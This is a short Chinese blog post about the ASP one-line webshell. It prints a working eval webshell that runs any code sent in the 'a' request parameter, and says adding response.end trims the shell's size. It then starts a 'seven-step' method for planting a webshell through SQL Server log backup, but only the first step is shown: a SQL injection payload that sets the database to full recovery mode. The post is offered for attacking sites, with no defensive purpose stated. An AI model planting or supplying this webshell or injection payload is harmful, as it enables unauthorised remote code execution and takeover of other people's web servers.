<%eval(request("a")):response.end%> 备分专用一句话
备分专用一句话2007-06-05 09:49 备分专用一句话
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
日志备分WEBSHELL标准的七步:
1.InjectionURL';alter database XXX set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)
...
原创
2009-02-25 08:51:42 ·
649 阅读 ·
0 评论